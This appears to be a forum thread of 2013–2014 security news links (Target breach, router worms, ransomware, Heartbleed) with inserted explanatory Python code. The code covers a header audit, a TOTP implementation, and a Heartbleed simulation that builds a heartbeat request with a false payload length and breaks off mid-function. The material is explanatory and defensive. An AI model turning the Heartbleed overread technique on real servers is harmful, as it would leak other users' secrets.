http://krebsonsecurity.com/2013/12/cards-stolen-in-target-breach-flood-underground-markets/
Since actually using the card at a Target Store is one of the requirements for being a victim, I'm happy to say that
neither Alice nor I actually used the card in or out of the store during the listed timeframe.
(After this fiasco, I will probably get rid of this card.)
-
(After this fiasco, I will probably get rid of this card.)
I'd do so Bob. (If you ever used it there.)
-
40 Million Credit and Debit Card customers are at risk! (https://corporate.target.com/discover/article/Important-Notice-Unauthorized-access-to-payment-ca)
( I'm one of those 40 Million. :'( )
Cards Stolen in Target Breach Flood Underground Markets
http://krebsonsecurity.com/2013/12/cards-stolen-in-target-breach-flood-underground-markets/
Exclusive: Target hackers stole encrypted bank PINs - source
http://www.reuters.com/article/2013/12/25/us-target-databreach-idUSBRE9BN0L220131225
-
NSA intercepts Windows error reports: http://www.spiegel.de/international/world/the-nsa-uses-powerful-toolbox-in-effort-to-spy-on-global-networks-a-940969-2.html
polonus
P.S. Blocking this: http://blog.laptopmag.com/disable-error-reporting-windows
-
Security researcher cancels talk at RSA conference in protest
http://news.idg.no/cw/art.cfm?id=60BD7FD4-9C49-1163-82CC191AC1C7C62A
-
4.6 million Snapchat phone numbers and usernames leaked
http://www.theverge.com/2014/1/1/5262740/4-6-million-snapchat-phone-numbers-and-usernames-leaked
-
Complete top level of scam domain should be blocked: http://bluecoat.com/security-blog/2013-05-07/health-and-finance-spam-version-death-and-taxes
article author = Chris Larsen
polonus
-
Malicious advertisements served via Yahoo
http://blog.fox-it.com/2014/01/03/malicious-advertisements-served-via-yahoo/
-
Progression:
Ransomware = Crypto Locker = Power Locker
More on Power Locker (http://malwaremustdie.blogspot.ro/2014/01/threat-intelligence-new-locker-prison.html)
-
The contents of the last two messages here taking as one threat -> malvertisements take users to Fake AV: http://www.invincea.com/2014/01/dailymotion-com-redirects-to-fake-av-threat/2/
pol
-
40 Million Credit and Debit Card customers are at risk! (https://corporate.target.com/discover/article/Important-Notice-Unauthorized-access-to-payment-ca)
( I'm one of those 40 Million. :'( )
Cards Stolen in Target Breach Flood Underground Markets
http://krebsonsecurity.com/2013/12/cards-stolen-in-target-breach-flood-underground-markets/
Exclusive: Target hackers stole encrypted bank PINs - source
http://www.reuters.com/article/2013/12/25/us-target-databreach-idUSBRE9BN0L220131225
Target Provides Update on Data Breach and Financial Performance
http://pressroom.target.com/news/target-provides-update-on-data-breach-and-financial-performance
-
Hackers Steal Card Data from Neiman Marcus
http://krebsonsecurity.com/2014/01/hackers-steal-card-data-from-neiman-marcus/
-
How USB sticks stole from ATMs
http://blogs.norman.com/2014/for-consumption/how-usb-sticks-stole-from-atms
-
What is Bitcoin – and how could it hurt my computer?
http://blogs.norman.com/2014/for-consumption/what-is-bitcoin-and-how-could-it-hurt-my-computer
-
Spammers hijack links on Google + -> http://searchengineland.com/thousands-of-hotels-listings-were-hijacked-in-google-local-181670
link article author Danny Sullivan
polonus
-
Spammers hijack links on Google + -> http://searchengineland.com/thousands-of-hotels-listings-were-hijacked-in-google-local-181670
link article author Danny Sullivan
polonus
As the article states, Google has already cleaned up the hijacked sites.
-
Hi bob3160,
Then Google folks are doing the same as we do here on the forums (spam cleansing) but on a grand scale :),
Damian
-
NSA secret and covert pathways into foreign air-gapped computers
http://www.nytimes.com/2014/01/15/us/nsa-effort-pries-open-computers-not-connected-to-internet.html?hp&_r=1
Other devices than PC's/workstations affected as well.
-
Why experts again advise to uninstall Java altogether, see: http://www.kb.cert.org/vuls/id/625617
Some kernel components should be completely rewritten according to Bitdefender's Bogdan Botezatu on Twitter (@bbotezatu).
polonus
-
Adware vendors buy Chrome Extensions to send ad- and malware-filled updates
http://arstechnica.com/security/2014/01/malware-vendors-buy-chrome-extensions-to-send-adware-filled-updates/
-
Vietnamese governmental attackers use poisoned Word documents to attack critical bloggers-> https://www.virustotal.com/nl/file/351813270729b78fb2fe33be9c57fcd6f3828576171c7f404ed53af77cd91206/analysis/
The malicious part is https://threatcenter.crdf.fr/?More&ID=83663&D=CRDF.Virus.Virus.MSWord.Sattelite987105478
and has been around since 2012 and is being used in the latest versions also: https://malwr.com/analysis/NWM5NDU4NmM4NWNlNDJiYzhiYmM4ODhkNGQzNWFkMTY/
Only 1 of 49 av vendors detect the attack code heuristically,
polonus
-
SPAM supposedly spotted leaving the fridge. ;D
http://www.theregister.co.uk/2014/01/20/spam_spotted_leaving_the_fridge/
http://www.proofpoint.com/about-us/press-releases/01162014.php
-
EE BrightBox routers can be hacked 'by simple copy/paste operation'
http://www.theregister.co.uk/2014/01/20/brightbox_routers_vuln/
-
Adware vendors buy Chrome Extensions to send ad- and malware-filled updates
http://arstechnica.com/security/2014/01/malware-vendors-buy-chrome-extensions-to-send-adware-filled-updates/
Nice apps get bad makeover after spammers buy them
http://blog.avast.com/2014/01/20/nice-apps-get-bad-makeover-after-spammers-buy-them/
-
Chrome Bugs Allow Sites to Listen to Your Private Conversations
http://talater.com/chrome-is-listening/
I wonder if this affects Chromium-based browsers as well since Chrome is based on it.
-
Visited Yahoo recently? You may have malware!
http://blogs.norman.com/2014/for-consumption/visited-yahoo-recently-you-may-have-malware
-
Important Security Update for Yahoo Mail Users
http://yahoo.tumblr.com/post/75083532312/important-security-update-for-yahoo-mail-users
-
Data snooping revelations, what can developers do to better protect users? (They let it slip :( )
Read: http://stackoverflow.com/questions/21389844/with-the-nsa-data-snooping-revelations-what-can-app-developers-do-to-prevent-th
The angry-bird app developers did not even provide a blocking mechanism - all so-called "sitting data" could be snooped upon, slurped and exploited for BB surveillance purposes!
polonus
P.S. Note - On a side-line.
We had some interesting thread here on blocking/uninstalling geo-location from various software. Why this was I do not know but somehow we have both lost thread and user ::) In hindsight from the revelations of grand scale data exploitation/abuse he had a lot of prophetic insight there and then...
I know you cannot blame the surveillance institutions simply on geo-location data proliferation sec, but it has been and still is an important facilitating factor where user snooping and user profiling is concerned. :-[
Read: http://www.ghacks.net/2010/05/10/how-to-disable-geolocation-in-google-chrome/
link author = Martin Brinkman
D
-
Malware infections “staying the same” say security experts
http://blogs.norman.com/2014/for-consumption/malware-infections-staying-the-same-say-security-experts
A new survey of computer security professionals has revealed that the amount of malware threats reaching users has stayed the same over the past year, and that users are more likely to be infected by surfing the internet than downloading attachments to emails.
-
Viruses now use your computer to infect your phone
http://blogs.norman.com/2014/for-consumption/viruses-now-use-your-computer-to-infect-your-phone
-
168 domains seized in grand counterfeit goods action: http://www.ice.gov/news/releases/1401/140130newyork.htm
polonus
-
About the danger of downloading ENC files and banking trojans: http://garwarner.blogspot.co.uk/2014/02/gameover-zeus-now-uses-encryption-to.html
article author = Gary Warner
Go over your logs and check!
polonus
-
it is not only NSA that watch over you ;D
NBC News' Richard Engel: My Computers, Cellphone Were Hacked 'Almost Immediately' In Sochi
http://www.huffingtonpost.com/2014/02/05/reporter-hacked-sochi-richard-engel_n_4731846.html
-
it is not only NSA that watch over you ;D
NBC News' Richard Engel: My Computers, Cellphone Were Hacked 'Almost Immediately' In Sochi
http://www.huffingtonpost.com/2014/02/05/reporter-hacked-sochi-richard-engel_n_4731846.html
I'm not planning to go there any time soon. :)
-
I will not go there too. You can watch the games in TV anyway. :)
-
New undetectable malcode as a new form of Iframe-injection hidden inside PNG-metadata.: http://blog.sucuri.net/2014/02/new-iframe-injections-leverage-png-image-metadata.html (link article author = Peter Framantik) -> http://safebrowsing.clients.google.com/safebrowsing/diagnostic?site=bestbinfo.com/
Detected here: http://www.nictasoft.com/ace/malware-urls/5096298/
polonus
-
New Ransomware Blocks Your DNS Connection And Forces Your Computer To Mine Bitcoins (http://techcrunch.com/2014/02/06/new-ransomware-blocks-your-dns-connection-and-forces-your-computer-to-mine-bitcoins/)
-
If you use Comcast change your passwords now
https://forums.malwarebytes.org/index.php?showtopic=141859&p=788025
-
News we should worry about: http://news.netcraft.com/archives/2014/02/07/are-there-really-lots-of-vulnerable-apache-web-servers.html
link article author = Paul Mutton
Got accustomed to that situation 8) - however shocking these results are! :o
polonus
P.S. Another reason to not spread the version number globally in the form of excessive header info for instance, question of configuration settings.
As a side-note within certain Apache configurations we cannot see what admins did to harden their server configuration,
so the survey results may be exaggerated. All updates and patches that could be run should be run however, that is a fact!
D
-
Java botnet hits Mac, Linux and Windows machines
http://www.theinquirer.net/inquirer/news/2326894/java-botnet-hits-mac-linux-and-windows-machines
The malware is a functioning botnet written entirely in Java and is capable of infecting computers running Windows, Mac OS X and Linux that have Oracle's Java software framework installed.
-
Exposed: Barclays account details for sale as 'gold mine' of up to 27,000 files is leaked in worst breach of bank data EVER
http://www.dailymail.co.uk/news/article-2554875/Barclays-account-details-sale-gold-27-000-files-leaked.html
-
http://www.theinquirer.net/inquirer/news/2328111/kaspersky-lab-unmasks-a-global-cyber-espionage-toolkit
Kaspersky Lab unmasks a global cyber espionage toolkit
The security firm announced its discovery of "The Mask" in a blog post and dissected it in a report, calling it "one of most advanced global cyber-espionage operations" it has ever seen.
-
hxxp://www.theinquirer.net/inquirer/news/2328111/kaspersky-lab-unmasks-a-global-cyber-espionage-toolkit
Already posted here http://forum.avast.com/index.php?topic=66267.msg1060810
-
Bitcoin stealer for Mac
New Apple Mac Trojan Called OSX/CoinThief Discovered
http://www.securemac.com/CoinThief-BitCoin-Trojan-Horse-MacOSX.php
-
Microsoft´s Bing complies with Chinese Censorship for all Chinese even outside China, read: https://zh.greatfire.org/blog/2014/feb/no-error-here-microsoft-deploying-chinese-censorship-global-scale
polonus
-
Frustrating user experience from a shady download portal (https://blog.avast.com/2014/02/12/24447/)
Maybe from now on, we also need to make sure that the program was
actually downloaded from a reputable place or, even better, from AVAST!
-
Hi bob3160,
Cybercrime and cyberscam rearing its ugly head everywhere.
Please be aware. Thanks for the heads-up on this one, bob3160. ;)
Watch your clicks, folks, don't be fooled.
Yes, watch those clicks of yours on the Interwebs :-[
polonus
-
2014-02-04: Advisory: Netgear
https://www.syss.de/news-events/advisories/advisory-netgear/
-
New Zero-Day for Blue E abused: http://www.fireeye.com/blog/technical/cyber-exploits/2014/02/new-ie-zero-day-found-in-watering-hole-attack-2.html
polonus
-
Scores of fake SSL certificates.
Read: http://news.netcraft.com/archives/2014/02/12/fake-ssl-certificates-deployed-across-the-internet.html
40% of mobile apps do not check for SSL-certificates:
http://blog.ioactive.com/2014/01/personal-banking-apps-leak-info-through.html
(link article author = Ariel Sanchez) - see attached image.
-
Linksys Worm "TheMoon" Summary: What we know so far
https://isc.sans.edu/diary/Linksys+Worm+%22TheMoon%22+Summary%3A+What+we+know+so+far/17633
-
Important Kickstarter Security Notice
https://www.kickstarter.com/blog/important-kickstarter-security-notice
-
Microsoft Security Advisory (2934088)
http://technet.microsoft.com/en-us/security/advisory/2934088
Fix It: http://support.microsoft.com/kb/2934088/en-us
-
Microsoft Security Advisory (2934088)
http://technet.microsoft.com/en-us/security/advisory/2934088
Fix It: http://support.microsoft.com/kb/2934088/en-us
Interesting - only affects IE9 and IE10 - No problem with IE8 on XP since MS wouldn't allow XP to update to IE9 or IE10 ;)
-
GreedyWonk
Another flash zero day exploit.
http://www.fireeye.com/blog/technical/targeted-attack/2014/02/operation-greedywonk-multiple-economic-and-foreign-policy-sites-compromised-serving-up-flash-zero-day-exploit.html
-
After Facebook acquired WhatsApp, people in Europe do not trust that Messenger app any longer and are leaving the mobile app massively to install the Russian-developed Telegram Messenger.
Couldn't this also be because of this news on reported security and apparent privacy problems? Re: http://www.praetorian.com/blog/whats-up-with-whatsapps-security-facebook-ssl-vulnerabilities
link article author = Paul Jauregui, a Praetorian security researcher.
SSL problems in WhatsApp - "This is the kind of stuff the NSA would love", says Jauregui.
polonus
-
Microsoft Security Advisory (2934088)
http://technet.microsoft.com/en-us/security/advisory/2934088
Fix It: http://support.microsoft.com/kb/2934088/en-us
Interesting - only affects IE9 and IE10 - No problem with IE8 on XP since MS wouldn't allow XP to update to IE9 or IE10 ;)
This also is telling: The fact that only some versions are affected seems to mean that not all versions are updated and made secure in the same way at the same time.
-
A secure alternative for the Whatsapp community could or might be this Swiss Threema, a mobile messaging app that puts security first
See: https://threema.ch/en/ Their claim: you can rest assured that only you and the intended recipient can read your messages.
All security these days is only relative security, and that is globally so. How far this is true also here I saw when I analyzed the SSL security headers on their very SSL site, where I saw problems with x-content-type-options, x-xss-protection, x-frame-options and content-security-policy, with secure headers not being returned. Also best practices are not followed on strict-transport-security. So for instance content sniffing stays possible for this service too, despite what they claim. Found these insecurities from their https site analyzed with Recx Security Analyzer.
Authentication however seems for the larger part OK: https://www.ssllabs.com/ssltest/analyze.html?d=threema.ch
What I think: stay calm, part of this is fear mongering. It is all "a hype of the day", at least m.p.o.
polonus
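The two header observations above (the Netcraft post's point about not advertising the Apache version in response headers, and the missing x-content-type-options, x-frame-options, x-xss-protection, content-security-policy and strict-transport-security headers seen on threema.ch) can both be checked with one small script. This is an added example, not code from the thread, from Recx Security Analyzer or from any site named here; the two header sets are constructed rather than captured from any real server, and the one-year HSTS max-age threshold is an assumption on my part.

```python
"""Audit one HTTP response's headers for software-version disclosure and
for missing or weak browser security headers.

Added example, not code from the thread, from Recx Security Analyzer or from
any site named in it. The two header sets below are constructed, not captured
from a real server; the HSTS threshold (one year) is an assumption."""
import re

# Headers that commonly leak product/version strings (e.g. "Apache/2.2.22").
DISCLOSURE_HEADERS = ("server", "x-powered-by", "x-aspnet-version")
VERSION_RE = re.compile(r"\d+\.\d+")

# Security headers a hardened site is expected to return, with a predicate
# that says whether the returned value is acceptable.
EXPECTED = {
    "x-content-type-options": lambda v: v.strip().lower() == "nosniff",
    "x-frame-options": lambda v: v.strip().upper() in ("DENY", "SAMEORIGIN"),
    "x-xss-protection": lambda v: v.strip().startswith("1"),
    "content-security-policy": lambda v: bool(v.strip()),
}

ONE_YEAR = 31536000  # seconds; assumed minimum HSTS max-age


def check_hsts(value, min_age=ONE_YEAR):
    """Return a list of HSTS weaknesses; an empty list means best practice."""
    if value is None:
        return ["missing"]
    directives = {}
    for part in value.split(";"):
        name, _, val = part.strip().partition("=")
        directives[name.lower()] = val
    try:
        max_age = int(directives.get("max-age", "0"))
    except ValueError:
        max_age = 0
    issues = []
    if max_age < min_age:
        issues.append("max-age below %d" % min_age)
    if "includesubdomains" not in directives:
        issues.append("no includeSubDomains")
    return issues


def audit_headers(headers):
    """headers: mapping of header name -> value (names compared
    case-insensitively). Returns a sorted list of human-readable findings."""
    h = {k.lower(): v for k, v in headers.items()}
    findings = []
    for name in DISCLOSURE_HEADERS:
        if name in h and VERSION_RE.search(h[name]):
            findings.append("version disclosed in %s: %s" % (name, h[name]))
    for name, acceptable in EXPECTED.items():
        if name not in h:
            findings.append("missing " + name)
        elif not acceptable(h[name]):
            findings.append("weak %s: %s" % (name, h[name]))
    for issue in check_hsts(h.get("strict-transport-security")):
        findings.append("strict-transport-security: " + issue)
    return sorted(findings)


# Constructed sample: a typical unhardened LAMP response.
LEAKY = {
    "Server": "Apache/2.2.22 (Ubuntu)",
    "X-Powered-By": "PHP/5.3.10",
    "Content-Type": "text/html",
}

# Constructed sample: what the same site returns after
# 'ServerTokens Prod' and the security headers are set.
HARDENED = {
    "Server": "Apache",
    "Content-Type": "text/html",
    "X-Content-Type-Options": "nosniff",
    "X-Frame-Options": "SAMEORIGIN",
    "X-XSS-Protection": "1; mode=block",
    "Content-Security-Policy": "default-src 'self'",
    "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
}

if __name__ == "__main__":
    for label, hdrs in (("leaky", LEAKY), ("hardened", HARDENED)):
        print(label, audit_headers(hdrs) or ["no findings"])
```

To run it against a live site, feed `audit_headers()` the header mapping from any HTTP client's response object instead of the constructed dicts. On the Apache side, `ServerTokens Prod` and `ServerSignature Off` in httpd.conf are what turn "Apache/2.2.22 (Ubuntu)" into a bare "Apache" (the version is hidden, not patched, so the "run all updates" advice above still stands), and the security headers are set with mod_headers' `Header always set ...` directives.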
-
Linksys Worm "TheMoon" Summary: What we know so far
https://isc.sans.edu/diary/Linksys+Worm+%22TheMoon%22+Summary%3A+What+we+know+so+far/17633
Not just Linksys and Asus, but many other top selling brands are open to attack ....
http://www.bbc.co.uk/news/technology-26287517
A separate study by security firm Tripwire has found that 80% of the 25 best-selling routers available on Amazon are vulnerable to compromise.
Security researcher Craig Young from Tripwire said exploits had been publicly discussed and published for more than one-third of these devices.
The past 12 months have seen a flurry of interest in routers by security researchers keen to find bugs and loopholes. One project detailing their findings now lists hundreds of exploits for routers from 36 separate manufacturers.
-
Hi AdrianH,
That is why to have secure procedures you should use cable.
Despite what everybody claims wifi is not fully secure and it never will be.
What is "hanging in the air" can be trapped, tracked and even compromised.
Dlink Amplifiers can be used to abuse.
Not everybody is behind a proxy fire-walled and neatly configured home network,
that puts the browser screen topsy-turvy for eventual intruders and then denies them.
So watch out. Security of open wifi is even worse.
We had a lot of problems here in Europe with Fritzbox routers lately
and despite many ISP warnings still a whole army of users did not upgrade
and are still vulnerable to remote hacks.
pol
-
Apple promises fix 'very soon' for Macs with failed encryption
http://www.reuters.com/article/2014/02/22/us-apple-encryption-idUSBREA1L10220140222
https://www.imperialviolet.org/2014/02/22/applebug.html
-
Poisoned YouTube ads serve Caphaw banking trojan
http://www.scmagazine.com/poisoned-youtube-ads-serve-caphaw-banking-trojan/article/335465/
-
Poisoned YouTube ads serve Caphaw banking trojan
http://www.scmagazine.com/poisoned-youtube-ads-serve-caphaw-banking-trojan/article/335465/
Another reason to always keep Java up to date !
-
@bob3160,
Or not use java at all.
@all
Internet Explorer was hit by most zero-days during all of 2013 when these zero-days were especially used on specific attacks against organizations and corporations.
This year we will see less Java attacks and more browser attacks according to FireEye, read: http://www2.fireeye.com/rs/fireye/images/fireeye-advanced-threat-report-2013.pdf
polonus
-
I haven't installed any Java on my Win8.1 laptop and haven't yet found anything that does not work.
-
Watch out for this Netflix “tech support” scam (http://arstechnica.com/security/2014/03/watch-out-for-this-netflix-tech-support-scam/)
A new twist on an old scam
-
Linksys Worm "TheMoon" Summary: What we know so far
https://isc.sans.edu/diary/Linksys+Worm+%22TheMoon%22+Summary%3A+What+we+know+so+far/17633
Not just Linksys and Asus, but many other top selling brands are open to attack ....
http://www.bbc.co.uk/news/technology-26287517
A separate study by security firm Tripwire has found that 80% of the 25 best-selling routers available on Amazon are vulnerable to compromise.
Security researcher Craig Young from Tripwire said exploits had been publicly discussed and published for more than one-third of these devices.
The past 12 months have seen a flurry of interest in routers by security researchers keen to find bugs and loopholes. One project detailing their findings now lists hundreds of exploits for routers from 36 separate manufacturers.
More here: https://www.team-cymru.com/ReadingRoom/Whitepapers/2013/TeamCymruSOHOPharming.pdf
-
Watch out for this Netflix “tech support” scam (http://arstechnica.com/security/2014/03/watch-out-for-this-netflix-tech-support-scam/)
A new twist on an old scam
The avast third party support is terrible but does not stoop to that level.
The third party support does "use" the event viewer to scare users into thinking
there are issues which do not exist.
-
Attack campaign compromises 300,000 home routers, alters DNS settings
http://www.pcworld.com/article/2104380/attack-campaign-compromises-300000-home-routers-alters-dns-settings.html
Bitcoin bank Flexcoin closes after hack attack
http://www.theguardian.com/technology/2014/mar/04/bitcoin-bank-flexcoin-closes-after-hack-attack
-
Critical crypto bug leaves Linux, hundreds of apps open to eavesdropping
http://arstechnica.com/security/2014/03/critical-crypto-bug-leaves-linux-hundreds-of-apps-open-to-eavesdropping/
-
Russians Suspected In ‘Uroburos’ Digital Espionage Attacks
http://www.techweekeurope.co.uk/news/russian-intelligence-uroburos-malware-140494
-
Secunia Vulnerability Review 2014 - Highlights
http://secunia.com/vulnerability-review/
-
Zeus and other cybercrime is returning, a lot not being detected by the average scanners.
All the time I report on these URLs and Types in the Virus and Worms,
See for yourselves here: htxp://cybercrime-tracker.net/
Do not click on links there, you could get infested!
polonus
-
F-Secure is strongly opposing the hijacking of criminal bot-net C&C servers by the NSA, read: http://www.f-secure.com/weblog/archives/00002684.html
link article author = Sean
His quote is a rather harsh remark on the institution: The NSA: a morally and ethically bankrupt institution that makes others feel silly for bothering with due process.
polonus
P.S. Edit: NSA denies it ever was into such actions without the proper authorization.
-
Google Docs Users Targeted by Sophisticated Phishing Scam
http://www.symantec.com/connect/blogs/google-docs-users-targeted-sophisticated-phishing-scam
-
Google Docs Users Targeted by Sophisticated Phishing Scam
http://www.symantec.com/connect/blogs/google-docs-users-targeted-sophisticated-phishing-scam
It's nice to know that Symantec users are protected from this attack. :)
It would be much more important to know that avast! also protects you from this Phishing attempt...... ???
-
New online tool for analyzing web-based malware
hxxps://barracudalabs.com/2014/03/introducing-threatglass-new-industry-portal-offering-exploration-visualization-and-analysis-of-exploited-websites/
hxxp://www.threatglass.com/
-
Hi Charyb,
Thanks for posting that for us. :)
polonus
-
Avast: Windows XP users already attacked 6 times more often than Windows 7 users (http://www.pcworld.com/article/2109144/avast-windows-xp-users-already-attacked-6-times-more-often-than-windows-7-users.html#tk.nl_today)
-
Avast: Windows XP users already attacked 6 times more often than Windows 7 users (http://www.pcworld.com/article/2109144/avast-windows-xp-users-already-attacked-6-times-more-often-than-windows-7-users.html#tk.nl_today)
Strange that, when others have never been attacked in the time that I have had avast and XP. I guess Safe browsing practice, proactive measures, a healthy dose of scepticism/suspicion and common sense goes a long way ;D
-
Avast: Windows XP users already attacked 6 times more often than Windows 7 users (http://www.pcworld.com/article/2109144/avast-windows-xp-users-already-attacked-6-times-more-often-than-windows-7-users.html#tk.nl_today)
Strange that, when others have never been attacked in the time that I have had avast and XP. I guess Safe browsing practice, proactive measures, a healthy dose of scepticism/suspicion and common sense goes a long way ;D
That makes up for most of it. Luck also has some part in it. :)
-
An eco friendly email virus just for Vlk (https://blog.avast.com/2014/03/20/the-first-eco-friendly-email-virus/) :)
-
An eco friendly email virus just for Vlk (https://blog.avast.com/2014/03/20/the-first-eco-friendly-email-virus/) :)
LOL ;D
-
An eco friendly email virus just for Vlk (https://blog.avast.com/2014/03/20/the-first-eco-friendly-email-virus/) :)
LOL ;D
;D ;D ;D
-
Fake Tor browser for iOS laced with adware, spyware, members warn
http://arstechnica.com/security/2014/03/fake-tor-browser-for-ios-laced-with-adware-spyware-members-warn/
-
Syrian hackers claim to reveal how much FBI pays Microsoft for customer data
http://rt.com/usa/syrian-hackers-reveal-fbi-microsoft-205/
I hope this is the correct section of the forum to post this.
-
Pirated software malware to cost business $491bn in 2014, study shows
http://www.computerweekly.com/news/2240216380/Pirated-software-malware-to-cost-business-491-in-2014-study-shows
-
New Hall of Shame site list: http://twofactorauth.org/ (sites without two-factor authorization, like Amazon, American Express, Citibank, Rackspace, Sugarsync & Healthcare.gov. Site author = Josh Davis.).
polonus
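For the mechanism those listed sites are missing: the six- or eight-digit codes that authenticator apps and hardware tokens produce are normally TOTP (RFC 6238), which is HOTP (RFC 4226) driven by a 30-second time counter. The implementation below is an added example, not code from the thread or from twofactorauth.org; the shared secret and timestamps are the published test vectors from RFC 4226 and RFC 6238 Appendix B, and the one-step clock-skew window in `verify_totp` is a common deployment choice rather than something the RFCs mandate.

```python
"""HOTP (RFC 4226) and TOTP (RFC 6238) in the standard library only.

Added example, not from the thread or from twofactorauth.org. The secret
and times used in the tests are the RFC test vectors; the +/-1 step
verification window is an assumed, common choice."""
import hashlib
import hmac
import struct
import time


def hotp(secret, counter, digits=6, digestmod=hashlib.sha1):
    """HOTP(K, C): HMAC over the 8-byte big-endian counter, dynamic
    truncation to 31 bits, then reduce modulo 10^digits."""
    mac = hmac.new(secret, struct.pack(">Q", counter), digestmod).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return "%0*d" % (digits, code % (10 ** digits))


def totp(secret, unix_time=None, step=30, digits=6, digestmod=hashlib.sha1):
    """TOTP = HOTP with counter = floor(unix_time / step)."""
    if unix_time is None:
        unix_time = int(time.time())
    return hotp(secret, int(unix_time) // step, digits, digestmod)


def verify_totp(secret, code, unix_time, window=1, step=30, **kw):
    """Accept the code for the current step and up to `window` steps on
    either side (clock skew, user typing late). hmac.compare_digest avoids
    a timing side channel on partially matching codes."""
    for offset in range(-window, window + 1):
        candidate = totp(secret, unix_time + offset * step, step=step, **kw)
        if hmac.compare_digest(candidate, code):
            return True
    return False


if __name__ == "__main__":
    # RFC 6238 Appendix B secret (ASCII digits), printed for the current time.
    rfc_secret = b"12345678901234567890"
    print("current TOTP for the RFC test secret:", totp(rfc_secret))
```

A real deployment also has to stop code replay (remember the last accepted counter per user and reject anything at or below it) and rate-limit attempts, since a six-digit code with a three-step window gives an online guesser roughly a 3-in-a-million chance per try; neither is shown above.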
-
Google encrypts Gmail...
http://www.dailymail.co.uk/news/article-2586849/Google-encrypts-Gmail-thwart-NSA-attempts-snoop-emails.html
-
Microsoft Security Advisory (2953095) Vulnerability in Microsoft Word Could Allow Remote Code Execution
http://technet.microsoft.com/en-us/security/advisory/2953095
Fix-It: https://support.microsoft.com/kb/2953095
-
Text message command makes infected ATMs spew cash (http://www.pcworld.com/article/2111360/atm-malware-controlled-by-a-text-message-spews-cash.html#tk.nl_today)
I'm still looking but no luck so far locating one of these ATMs :)
-
New MitM attacks impersonate banking sites without triggering alerts
http://blog.phishlabs.com/new-man-in-the-middle-attacks-leveraging-rogue-dns link article author = Don Jackson
polonus
-
Security vendor Trustwave named in Target-related suit (http://www.pcworld.com/article/2111980/security-vendor-trustwave-named-in-targetrelated-suit.html#tk.nl_today)
-
Target accelerates rollout of chip-enabled card readers
http://www.bizjournals.com/twincities/news/2014/03/26/target-accelerates-rollout-of-chip-enabled-cards.html
-
20% of all malware ever created appeared in 2013
http://press.pandasecurity.com/news/20-of-all-malware-ever-created-appeared-in-2013/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+presspandasecurity+%28Press+Panda+Security%29
-
As users who regularly visit and look through my postings on website analysis in the "virus and worms" section should know -
a large number of websites have outdated CMS, putting the websites and their visitors in danger!
see: http://www.whitefirdesign.com/blog/2014/03/03/outdated-versions-of-joomla-2-5-x-and-3-x-widely-used/
and http://www.whitefirdesign.com/blog/2014/03/27/only-one-third-of-drupal-7-websites-are-up-to-date/
polonus
-
Hack of Boxee.tv exposes password data, messages for 158,000 users
http://arstechnica.com/security/2014/04/hack-of-boxee-tv-exposes-password-data-messages-for-158000-users/
-
New feature in Win32/Sality - a router’s primary DNS changer named Win32/RBrute: http://www.welivesecurity.com/2014/04/02/win32sality-newest-component-a-routers-primary-dns-changer-named-win32rbrute/ link article author = Benjamin Vanheuverzwijn.
polonus
-
What is your IP saying about you?
http://www.infobyip.com/
-
Zeus malware found with valid digital certificate
http://www.networkworld.com/news/2014/040414-zeus-malware-found-with-valid-280416.html?hpg1=bn
-
What is your IP saying about you?
http://www.infobyip.com/
Well, it's about 250 miles off on my geographical location.
-
Child's play!
http://www.10news.com/news/5-year-old-ocean-beach-exposes-microsoft-xbox-vulnerability
-
Child's play!
http://www.10news.com/news/5-year-old-ocean-beach-exposes-microsoft-xbox-vulnerability
We must read the same publication. :)
-
The Heartbleed Bug
http://heartbleed.com/
-
Big increase of the abuse of legit (compromised) sites by cyber criminals: https://community.websense.com/blogs/websense-insights/archive/2014/04/03/websense-security-labs-2014-threat-report-uncovers-cyber-attack-trends.aspx (link publication author = Charles Renert)
polonus
-
The Heartbleed Bug
http://heartbleed.com/
Heartbleed affects much of internet. Time to change your passwords again.
http://blog.avast.com/2014/04/09/heartbleed-affects-much-of-internet-time-to-change-your-passwords-again/
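For readers who want the mechanism behind the headlines: Heartbleed (CVE-2014-0160) is a missing bounds check in OpenSSL's handling of the TLS heartbeat extension (RFC 6520). A heartbeat request carries a 16-bit payload_length field; the affected versions copied that many bytes from the received record into the reply without checking that the record was actually that long, so a peer that claimed 64 KB of payload while sending a few bytes got back whatever sat next in memory. The model below is an added example written in pure Python, not OpenSSL's code and not from the thread; the "memory" is a constructed bytearray standing in for the heap, SECRET is made up, and only the length check itself is modelled.

```python
"""Model of the TLS heartbeat (RFC 6520) length-check bug known as
Heartbleed, CVE-2014-0160, in pure Python.

Added example, not OpenSSL's code and not from the thread. `memory` is a
constructed bytearray standing in for the heap; SECRET is made up."""
import struct

HEARTBEAT_REQUEST = 1
HEARTBEAT_RESPONSE = 2
PADDING_LEN = 16  # RFC 6520 minimum padding after the payload
HEADER_LEN = 3    # 1 byte type + 2 bytes payload_length

# Constructed stand-in for data belonging to other connections that happens
# to sit in memory right after the received heartbeat record.
SECRET = b"session cookie=abc123; password=hunter2"


def build_heartbeat(payload, claimed_length=None):
    """Build a heartbeat request record. `claimed_length` lets the sender
    lie about the payload length, which is the whole attack."""
    length = len(payload) if claimed_length is None else claimed_length
    return struct.pack("!BH", HEARTBEAT_REQUEST, length) + payload + b"\x00" * PADDING_LEN


def vulnerable_handler(memory, record_len):
    """Pre-1.0.1g behaviour: trusts payload_length from the peer and copies
    that many bytes, ignoring how long the record really was."""
    hb_type, payload_len = struct.unpack_from("!BH", memory, 0)
    if hb_type != HEARTBEAT_REQUEST:
        return None
    echoed = bytes(memory[HEADER_LEN:HEADER_LEN + payload_len])
    return struct.pack("!BH", HEARTBEAT_RESPONSE, payload_len) + echoed


def fixed_handler(memory, record_len):
    """The 1.0.1g check: the claimed payload plus header and padding must fit
    inside the record that was actually received; otherwise the record is
    silently discarded, as RFC 6520 section 4 requires."""
    if record_len < HEADER_LEN + PADDING_LEN:
        return None
    hb_type, payload_len = struct.unpack_from("!BH", memory, 0)
    if hb_type != HEARTBEAT_REQUEST:
        return None
    if HEADER_LEN + payload_len + PADDING_LEN > record_len:
        return None
    echoed = bytes(memory[HEADER_LEN:HEADER_LEN + payload_len])
    return struct.pack("!BH", HEARTBEAT_RESPONSE, payload_len) + echoed


def simulate(handler, payload, claimed_length=None):
    """Place the record in memory directly in front of SECRET and run the
    handler on it with the true record length."""
    record = build_heartbeat(payload, claimed_length)
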